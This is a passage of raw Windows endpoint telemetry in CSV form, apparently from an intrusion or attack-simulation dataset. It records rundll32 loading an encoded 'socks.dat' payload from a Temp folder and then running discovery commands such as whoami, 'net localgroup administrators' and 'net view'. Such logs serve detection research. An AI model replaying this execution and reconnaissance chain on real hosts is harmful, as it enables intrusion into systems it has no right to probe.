04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+170,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:15:13.442789900+00:00,3236,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:15:13.373323900+00:00,6036,cmd.exe,"""cmd.exe"" /c ""whoami""",False,2021-06-23 03:14:29.844176700+00:00,13028,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:15:13.540127+00:00,2021-06-23 03:16:43.470671600+00:00,411c28d7-d0af-488b-9834-8514d1cac693,computerpii_0a470890c60768167990033d701e7bd881398861,161198,False,10.7740.19041.1052,False,11540474045173021,,11540474045173022,2021-06-23 03:15:13.373323900+00:00,6036,2021-06-23 03:15:13.373323900+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,6036,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+171,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:15:13.497711300+00:00,12564,whoami.exe,whoami,PortableExecutable,2019-12-07 09:09:51.678279900+00:00,C:\Windows\System32\whoami.exe,73728,a4a6924f3eaf97981323703d38fd99c4,1d4902a04d99e8ccbfe7085e63155955fee397449d386453f6c452ae407b8743,1915fbfdb73fdd200c47880247acdde5442431a9,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:15:13.373323900+00:00,6036,cmd.exe,"""cmd.exe"" /c ""whoami""",False,2021-06-23 03:14:29.844176700+00:00,13028,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:15:13.542638900+00:00,2021-06-23 03:16:43.470705300+00:00,0769e0b8-78bc-4396-a95e-2d8929877f8d,computerpii_0a470890c60768167990033d701e7bd881398861,161199,False,10.7740.19041.1052,False,11540474045173021,,11540474045173023,2021-06-23 03:15:13.373323900+00:00,6036,2021-06-23 03:15:13.373323900+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,6036,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,whoami.exe,whoami.exe,whoami - displays logged on user information
+172,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:15:31.376614900+00:00,1388,cmd.exe,"""cmd.exe"" /c ""net localgroup administrators""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:14:29.844176700+00:00,13028,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",False,2021-06-23 03:12:10.599816700+00:00,18532,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:15:31.669452200+00:00,2021-06-23 03:16:43.470741+00:00,ced395ea-10bb-44dc-a751-94d775e63985,computerpii_0a470890c60768167990033d701e7bd881398861,161200,False,10.7740.19041.1052,False,11540474045173018,,11540474045173024,2021-06-23 03:14:29.844176700+00:00,13028,2021-06-23 03:14:29.844176700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,13028,128,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+173,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:15:31.397644600+00:00,2720,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:15:31.376614900+00:00,1388,cmd.exe,"""cmd.exe"" /c ""net localgroup administrators""",False,2021-06-23 03:14:29.844176700+00:00,13028,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:15:31.670477+00:00,2021-06-23 03:16:43.470775+00:00,d3824a28-024b-42ee-ad9b-62b46db32d09,computerpii_0a470890c60768167990033d701e7bd881398861,161201,False,10.7740.19041.1052,False,11540474045173024,,11540474045173025,2021-06-23 03:15:31.376614900+00:00,1388,2021-06-23 03:15:31.376614900+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,1388,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+174,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:15:31.439293900+00:00,7408,net.exe,net  localgroup administrators,PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\net.exe,59904,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:15:31.376614900+00:00,1388,cmd.exe,"""cmd.exe"" /c ""net localgroup administrators""",False,2021-06-23 03:14:29.844176700+00:00,13028,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:15:31.677419400+00:00,2021-06-23 03:16:43.470809700+00:00,fbf106b4-0f55-4dce-9e8a-e254fb300116,computerpii_0a470890c60768167990033d701e7bd881398861,161202,False,10.7740.19041.1052,False,11540474045173024,,11540474045173026,2021-06-23 03:15:31.376614900+00:00,1388,2021-06-23 03:15:31.376614900+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,1388,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command
+175,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:15:31.451723100+00:00,8688,net1.exe,net1  localgroup administrators,PortableExecutable,2021-03-11 01:07:22.990816900+00:00,C:\Windows\System32\net1.exe,183808,ba0bccc6029fbbe6d8b41197f252742f,253e6148ec7a95ea3950e032f9def1ec7c0e0cd172cc6d770d2807a64fc4a7ca,fa29205a40d3cbc69946784946c75eb66afd9950,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:15:31.439293900+00:00,7408,net.exe,net  localgroup administrators,False,2021-06-23 03:15:31.376614900+00:00,1388,\Device\HarddiskVolume3\Windows\System32\cmd.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:15:31.681630800+00:00,2021-06-23 03:16:43.470842600+00:00,06b86a94-00f1-481d-b7c1-d99cad697b36,computerpii_0a470890c60768167990033d701e7bd881398861,161203,False,10.7740.19041.1052,False,11540474045173026,,11540474045173027,2021-06-23 03:15:31.439293900+00:00,7408,2021-06-23 03:15:31.439293900+00:00,\Device\HarddiskVolume3\Windows\System32\net.exe,7408,128,ActiveProcessStartkey,C:\Windows\System32,59904,1986-05-05 23:55:09+00:00,2019-12-07 09:09:33.990210300+00:00,2021-06-23 03:15:31.436697300+00:00,2019-12-07 09:09:33.990210300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,net1.exe,net1.exe,Net Command
+176,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:15:42.372903400+00:00,16068,cmd.exe,"""cmd.exe"" /c ""net view""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:14:29.844176700+00:00,13028,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",False,2021-06-23 03:12:10.599816700+00:00,18532,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:15:43.373387200+00:00,2021-06-23 03:16:43.471289900+00:00,76b756f5-31de-4305-abb9-12fcb6a96fa9,computerpii_0a470890c60768167990033d701e7bd881398861,161216,False,10.7740.19041.1052,False,11540474045173018,,11540474045173028,2021-06-23 03:14:29.844176700+00:00,13028,2021-06-23 03:14:29.844176700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,13028,128,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+177,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:15:42.383205900+00:00,16256,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:15:42.372903400+00:00,16068,cmd.exe,"""cmd.exe"" /c ""net view""",False,2021-06-23 03:14:29.844176700+00:00,13028,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:15:43.373680300+00:00,2021-06-23 03:16:43.471325600+00:00,d2d816ca-ad3b-48fc-a97f-2f44d01acc1a,computerpii_0a470890c60768167990033d701e7bd881398861,161217,False,10.7740.19041.1052,False,11540474045173028,,11540474045173029,2021-06-23 03:15:42.372903400+00:00,16068,2021-06-23 03:15:42.372903400+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,16068,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+178,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:15:42.423376900+00:00,1400,net.exe,net  view,PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\net.exe,59904,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:15:42.372903400+00:00,16068,cmd.exe,"""cmd.exe"" /c ""net view""",False,2021-06-23 03:14:29.844176700+00:00,13028,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:15:43.374768100+00:00,2021-06-23 03:16:43.471359600+00:00,41301043-4d6c-44b2-af4a-9a78d60c4284,computerpii_0a470890c60768167990033d701e7bd881398861,161218,False,10.7740.19041.1052,False,11540474045173028,,11540474045173030,2021-06-23 03:15:42.372903400+00:00,16068,2021-06-23 03:15:42.372903400+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,16068,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command
+179,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:16:01.335055300+00:00,1424,LocalBridge.exe,"""LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications",PortableExecutable,2021-05-12 01:05:25.592776700+00:00,C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe,169872,9774ac9f3b1c9b7ceb3a28568eff0720,4d18d9aca0208f2c244e751ad6b3d8472308616a1d0caa38988da78aad9c11ae,aa7db5827702c2b0b8e70119a7a3a7a110c4a59a,ba4cfe6461afa1004c52f19c8f2169dc,e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628,ab8539ef6b2a93ff9589dec4b34a0257b6296c92,S-1-12-1-3476864874-1154527411-4288707492-1560701320,domainpii_6c8dcea42fcdd51d2421333a881b2b98b372fa53,userpii_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:01.250792+00:00,380,RuntimeBroker.exe,RuntimeBroker.exe -Embedding,False,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:16:01.531955600+00:00,2021-06-23 03:16:43.472099600+00:00,a1c70785-731a-422d-aeac-bc197fd48ff0,computerpii_0a470890c60768167990033d701e7bd881398861,161238,False,10.7740.19041.1052,False,11540474045173038,,11540474045173039,2021-06-23 03:16:01.250792+00:00,380,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,128,Missing,c:\windows\system32\runtimebroker.exe,103288,2018-08-18 19:29:32+00:00,2021-02-17 04:34:50.958184300+00:00,2021-06-22 00:44:19.085614600+00:00,2021-02-17 04:34:50.954376500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,128.0,5.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RuntimeBroker.exe,RuntimeBroker.exe,Runtime Broker,,LocalBridge,18.2104.1272.0,LocalBridge.exe,LocalBridge.exe,LocalBridge
